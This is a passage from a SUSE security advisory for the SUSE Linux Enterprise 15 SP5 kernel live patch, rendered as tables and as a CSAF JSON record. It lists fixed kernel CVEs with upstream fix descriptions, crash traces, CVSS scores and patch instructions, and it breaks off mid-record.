| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
59 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 29 for SUSE Linux Enterprise 15 SP5)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 5.14.21-150500.55.116 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).\n- CVE-2023-53257: wifi: mac80211: check S1G action frame size (bsc#1250730).\n- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).\n- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).\n- CVE-2025-38159: wifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds (bsc#1257629).\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1039,SUSE-SLE-Module-Live-Patching-15-SP5-2026-1039",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1039-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1039-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261039-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1039-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024926.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1250730",
"url": "https://bugzilla.suse.com/1250730"
},
{
"category": "self",
"summary": "SUSE Bug 1254755",
"url": "https://bugzilla.suse.com/1254755"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255595",
"url": "https://bugzilla.suse.com/1255595"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257118",
"url": "https://bugzilla.suse.com/1257118"
},
{
"category": "self",
"summary": "SUSE Bug 1257629",
"url": "https://bugzilla.suse.com/1257629"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50697 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50697/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53257 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53781 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53781/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21738 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21738/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38159 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38159/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 29 for SUSE Linux Enterprise 15 SP5)",
"tracking": {
"current_release_date": "2026-03-25T12:34:25Z",
"generator": {
"date": "2026-03-25T12:34:25Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1039-1",
"initial_release_date": "2026-03-25T12:34:25Z",
"revision_history": [
{
"date": "2026-03-25T12:34:25Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"product_id": "kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"product_id": "kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64",
"product_id": "kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-50697",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50697"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmrp: introduce active flags to prevent UAF when applicant uninit\n\nThe caller of del_timer_sync must prevent restarting of the timer, If\nwe have no this synchronization, there is a small probability that the\ncancellation will not be successful.\n\nAnd syzbot report the fellowing crash:\n==================================================================\nBUG: KASAN: use-after-free in hlist_add_head include/linux/list.h:929 [inline]\nBUG: KASAN: use-after-free in enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\nWrite at addr f9ff000024df6058 by task syz-fuzzer/2256\nPointer tag: [f9], memory tag: [fe]\n\nCPU: 1 PID: 2256 Comm: syz-fuzzer Not tainted 6.1.0-rc5-syzkaller-00008-\nge01d50cbd6ee #0\nHardware name: linux,dummy-virt (DT)\nCall trace:\n dump_backtrace.part.0+0xe0/0xf0 arch/arm64/kernel/stacktrace.c:156\n dump_backtrace arch/arm64/kernel/stacktrace.c:162 [inline]\n show_stack+0x18/0x40 arch/arm64/kernel/stacktrace.c:163\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x68/0x84 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:284 [inline]\n print_report+0x1a8/0x4a0 mm/kasan/report.c:395\n kasan_report+0x94/0xb4 mm/kasan/report.c:495\n __do_kernel_fault+0x164/0x1e0 arch/arm64/mm/fault.c:320\n do_bad_area arch/arm64/mm/fault.c:473 [inline]\n do_tag_check_fault+0x78/0x8c arch/arm64/mm/fault.c:749\n do_mem_abort+0x44/0x94 arch/arm64/mm/fault.c:825\n el1_abort+0x40/0x60 arch/arm64/kernel/entry-common.c:367\n el1h_64_sync_handler+0xd8/0xe4 arch/arm64/kernel/entry-common.c:427\n el1h_64_sync+0x64/0x68 arch/arm64/kernel/entry.S:576\n hlist_add_head include/linux/list.h:929 [inline]\n enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\n mod_timer+0x14/0x20 kernel/time/timer.c:1161\n mrp_periodic_timer_arm net/802/mrp.c:614 [inline]\n mrp_periodic_timer+0xa0/0xc0 net/802/mrp.c:627\n call_timer_fn.constprop.0+0x24/0x80 kernel/time/timer.c:1474\n expire_timers+0x98/0xc4 kernel/time/timer.c:1519\n\nTo fix it, we can introduce a new active flags to make sure the timer will\nnot restart.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50697",
"url": "https://www.suse.com/security/cve/CVE-2022-50697"
},
{
"category": "external",
"summary": "SUSE Bug 1255594 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255594"
},
{
"category": "external",
"summary": "SUSE Bug 1255595 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255595"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T12:34:25Z",
"details": "important"
}
],
"title": "CVE-2022-50697"
},
{
"cve": "CVE-2023-53257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: check S1G action frame size\n\nBefore checking the action code, check that it even\nexists in the frame.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53257",
"url": "https://www.suse.com/security/cve/CVE-2023-53257"
},
{
"category": "external",
"summary": "SUSE Bug 1249869 for CVE-2023-53257",
"url": "https://bugzilla.suse.com/1249869"
},
{
"category": "external",
"summary": "SUSE Bug 1250730 for CVE-2023-53257",
"url": "https://bugzilla.suse.com/1250730"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T12:34:25Z",
"details": "important"
}
],
"title": "CVE-2023-53257"
},
{
"cve": "CVE-2023-53781",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53781"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc: Fix use-after-free in tcp_write_timer_handler().\n\nWith Eric\u0027s ref tracker, syzbot finally found a repro for\nuse-after-free in tcp_write_timer_handler() by kernel TCP\nsockets. [0]\n\nIf SMC creates a kernel socket in __smc_create(), the kernel\nsocket is supposed to be freed in smc_clcsock_release() by\ncalling sock_release() when we close() the parent SMC socket.\n\nHowever, at the end of smc_clcsock_release(), the kernel\nsocket\u0027s sk_state might not be TCP_CLOSE. This means that\nwe have not called inet_csk_destroy_sock() in __tcp_close()\nand have not stopped the TCP timers.\n\nThe kernel socket\u0027s TCP timers can be fired later, so we\nneed to hold a refcnt for net as we do for MPTCP subflows\nin mptcp_subflow_create_socket().\n\n[0]:\nleaked reference.\n sk_alloc (./include/net/net_namespace.h:335 net/core/sock.c:2108)\n inet_create (net/ipv4/af_inet.c:319 net/ipv4/af_inet.c:244)\n __sock_create (net/socket.c:1546)\n smc_create (net/smc/af_smc.c:3269 net/smc/af_smc.c:3284)\n __sock_create (net/socket.c:1546)\n __sys_socket (net/socket.c:1634 net/socket.c:1618 net/socket.c:1661)\n __x64_sys_socket (net/socket.c:1672)\n do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)\n entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120)\n==================================================================\nBUG: KASAN: slab-use-after-free in tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\nRead of size 1 at addr ffff888052b65e0d by task syzrepro/18091\n\nCPU: 0 PID: 18091 Comm: syzrepro Tainted: G W 6.3.0-rc4-01174-gb5d54eb5899a #7\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-1.amzn2022.0.1 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl (lib/dump_stack.c:107)\n print_report (mm/kasan/report.c:320 mm/kasan/report.c:430)\n kasan_report (mm/kasan/report.c:538)\n tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\n tcp_write_timer (./include/linux/spinlock.h:390 net/ipv4/tcp_timer.c:643)\n call_timer_fn (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/timer.h:127 kernel/time/timer.c:1701)\n __run_timers.part.0 (kernel/time/timer.c:1752 kernel/time/timer.c:2022)\n run_timer_softirq (kernel/time/timer.c:2037)\n __do_softirq (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/irq.h:142 kernel/softirq.c:572)\n __irq_exit_rcu (kernel/softirq.c:445 kernel/softirq.c:650)\n irq_exit_rcu (kernel/softirq.c:664)\n sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1107 (discriminator 14))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53781",
"url": "https://www.suse.com/security/cve/CVE-2023-53781"
},
{
"category": "external",
"summary": "SUSE Bug 1254751 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254751"
},
{
"category": "external",
"summary": "SUSE Bug 1254755 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254755"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T12:34:25Z",
"details": "important"
}
],
"title": "CVE-2023-53781"
},
{
"cve": "CVE-2025-21738",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21738"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nata: libata-sff: Ensure that we cannot write outside the allocated buffer\n\nreveliofuzzing reported that a SCSI_IOCTL_SEND_COMMAND ioctl with out_len\nset to 0xd42, SCSI command set to ATA_16 PASS-THROUGH, ATA command set to\nATA_NOP, and protocol set to ATA_PROT_PIO, can cause ata_pio_sector() to\nwrite outside the allocated buffer, overwriting random memory.\n\nWhile a ATA device is supposed to abort a ATA_NOP command, there does seem\nto be a bug either in libata-sff or QEMU, where either this status is not\nset, or the status is cleared before read by ata_sff_hsm_move().\nAnyway, that is most likely a separate bug.\n\nLooking at __atapi_pio_bytes(), it already has a safety check to ensure\nthat __atapi_pio_bytes() cannot write outside the allocated buffer.\n\nAdd a similar check to ata_pio_sector(), such that also ata_pio_sector()\ncannot write outside the allocated buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21738",
"url": "https://www.suse.com/security/cve/CVE-2025-21738"
},
{
"category": "external",
"summary": "SUSE Bug 1238917 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1238917"
},
{
"category": "external",
"summary": "SUSE Bug 1257118 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1257118"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T12:34:25Z",
"details": "important"
}
],
"title": "CVE-2025-21738"
},
{
